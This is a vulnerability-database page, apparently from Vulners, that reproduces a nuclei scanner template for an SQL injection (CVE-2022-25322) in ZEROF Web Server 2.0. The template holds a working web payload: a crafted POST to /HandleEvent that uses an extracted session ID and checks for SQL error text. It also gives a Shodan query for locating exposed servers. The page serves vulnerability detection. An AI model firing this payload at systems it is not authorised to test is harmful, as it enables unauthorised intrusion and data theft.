Lucene search
K

ZEROF Web Server 2.0 - SQL Injection

🗓️ 02 Jul 2026 09:36:57Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 15 Views

ZEROF Web Server 2.0 exposes SQL Injection through the /HandleEvent endpoint, enabling attackers to execute arbitrary SQL queries.

Related
Refs
Code
ReporterTitlePublishedViews
Family
GithubExploit
Exploit for SQL Injection in Zerof Web_Server
18 Feb 202212:51
githubexploit
ATTACKERKB
CVE-2022-25322
18 Feb 202217:15
attackerkb
Circl
CVE-2022-25322
18 Feb 202220:40
circl
CNNVD
ZEROF Web Server SQL注入漏洞
18 Feb 202200:00
cnnvd
Check Point Advisories
ZEROF Web Server SQL Injection (CVE-2022-25322)
17 Nov 202200:00
checkpoint_advisories
CVE
CVE-2022-25322
18 Feb 202216:58
cve
Cvelist
CVE-2022-25322
18 Feb 202216:58
cvelist
EUVD
EUVD-2022-30005
18 Feb 202216:58
euvd
NVD
CVE-2022-25322
18 Feb 202217:15
nvd
OSV
CVE-2022-25322
18 Feb 202217:15
osv
Rows per page
id: CVE-2022-25322

info:
  name: ZEROF Web Server 2.0 - SQL Injection
  author: daffainfo
  severity: critical
  description: |
    ZEROF Web Server 2.0 allows SQL Injection via the /HandleEvent endpoint. Attackers can exploit this vulnerability by manipulating the request parameters to execute arbitrary SQL queries.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation.
  remediation: |
    Apply the latest security patches or updates provided by the vendor to fix the SQL Injection vulnerability in ZEROF Web Server 2.0.
  reference:
    - https://github.com/landigv/research/blob/main/cve/CVE-2022-25322.md
    - https://nvd.nist.gov/vuln/detail/CVE-2022-25322
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2022-25322
    cwe-id: CWE-89
    epss-score: 0.0856
    epss-percentile: 0.94402
    cpe: cpe:2.3:a:zerof:web_server:2.0:*:*:*:*:*:*:*
  metadata:
    max-request: 2
    vendor: zerof
    product: web_server
    shodan-query: "Server: ZEROF Web Server"
  tags: cve,cve2022,zerof,sqli,vkev,vuln

flow: http(1) && http(2)

http:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'contains_all(body, "_S_ID", "<title>ZEROF Web Server</title>")'
          - 'status_code == 200'
        condition: and
        internal: true

    extractors:
      - type: regex
        name: s_id
        internal: true
        group: 1
        regex:
          - '_S_ID="_S_ID=(.*?)";'

  - raw:
      - |
        POST /HandleEvent HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded
        Content-Length: 119

        Ajax=1&IsEvent=1&Obj=O33&Evt=keypress&this=O33&char=%0D&"_fp_=_S_ID={{s_id}}&O33=%020%02%02'&_seq_=2&_uo_=O0

    unsafe: true
    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "You have an error in your SQL syntax"

      - type: word
        part: header
        words:
          - "ZEROF Web Server"

      - type: status
        status:
          - 200
# digest: 4a0a0047304502200e7ae4ccaa6be38f898f067cc3ad31eba08b51bbeb7d945009371cf425af81c10221009bb2324f1f3d168a4577b6d631eabf7a0a2228e078e37b85b17e7f646e5ff04e:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
7.6High risk
Vulners AI Score7.6
CVSS 27.5
CVSS 3.19.8
EPSS0.0856
15